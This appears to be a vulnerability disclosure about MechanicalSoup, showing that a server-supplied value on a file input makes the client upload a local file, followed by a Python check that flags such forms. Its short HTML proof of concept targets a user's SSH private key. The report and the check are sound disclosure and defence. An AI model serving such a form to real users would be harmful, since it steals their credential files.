Cleanup done already.

Summary
=======

A malicious web server can read arbitrary files on the client using a <input type="file" ...> inside HTML form.

Details
=======

[…]

The file path is taken from the bs4 tag "value" attribute. However, this path will default to whatever the server sends. So if a malicious web server were to send something like:

    <html><body>
      <form method="post" enctype="multipart/form-data">
        <input type="text" name="greeting" value="hello" />
        <input type="file" name="evil" value="/home/user/.ssh/id_rsa" />
      </form>
    </body></html>

then upon .submit_selected() the mechanicalsoup browser will happily send over the contents of your SSH private key.
Thanks!
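A client-side check for the condition described in the report, as an added example that is not part of the original message or of MechanicalSoup: it scans response HTML for file inputs that arrive with a server-supplied `value`, so a caller can refuse to submit such a form. The names `find_prefilled_file_inputs` and `refuse_prefilled_file_inputs` are hypothetical, and the standard-library `html.parser` is used here instead of bs4.

```python
from html.parser import HTMLParser

# Constructed sample: the form from the report plus one benign, empty file field.
SAMPLE = """<html><body>
<form method="post" enctype="multipart/form-data">
  <input type="text" name="greeting" value="hello" />
  <input type="file" name="evil" value="/home/user/.ssh/id_rsa" />
  <input type="FILE" name="avatar" />
</form>
</body></html>"""


class FileInputAudit(HTMLParser):
    """Collect <input type="file"> tags whose value was set by the server."""

    def __init__(self):
        super().__init__()
        self.prefilled = []  # list of (field name, server-supplied path)

    def handle_starttag(self, tag, attrs):
        # Also reached for self-closing tags such as <input ... />.
        if tag != "input":
            return
        a = {k: (v or "") for k, v in attrs}
        is_file = a.get("type", "").strip().lower() == "file"
        if is_file and a.get("value", "").strip():
            self.prefilled.append((a.get("name", ""), a["value"]))


def find_prefilled_file_inputs(html):
    """Return every file field whose path came from the page, not the user."""
    audit = FileInputAudit()
    audit.feed(html)
    audit.close()
    return audit.prefilled


def refuse_prefilled_file_inputs(html):
    """Raise before submission if the server pre-selected any local file."""
    found = find_prefilled_file_inputs(html)
    if found:
        fields = ", ".join(f"{name!r} -> {path!r}" for name, path in found)
        raise ValueError(f"server-supplied file paths in form: {fields}")


if __name__ == "__main__":
    print(find_prefilled_file_inputs(SAMPLE))
```
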